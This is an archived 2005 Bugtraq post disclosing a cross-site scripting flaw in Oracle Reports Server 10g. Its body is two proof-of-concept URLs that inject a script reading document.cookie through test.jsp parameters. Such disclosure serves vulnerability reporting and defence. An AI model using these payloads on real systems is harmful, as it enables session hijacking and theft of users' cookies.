[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Oracle Reports Server 10g Vulnerable to XSS
From: Paolo Paolo <paolo.paolo () mail ! ee>
Date: 2005-03-24 14:23:10
Message-ID: 20050324142310.12492.qmail () www ! securityfocus ! com
[Download RAW message or body]
Oracle Reports Server 10g (9.0.4.3.3) Vulnerable to Cross Site Scripting
#####################
http://paolo/reports/examples/Tools/test.jsp?repprod&desname='<script>alert(document.cookie);</script>
http://paolo/reports/examples/Tools/test.jsp?repprod"<script>alert(document.cookie);</script>
#####################
Paolo sends GREETS to Oracle secalert
Paolo
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic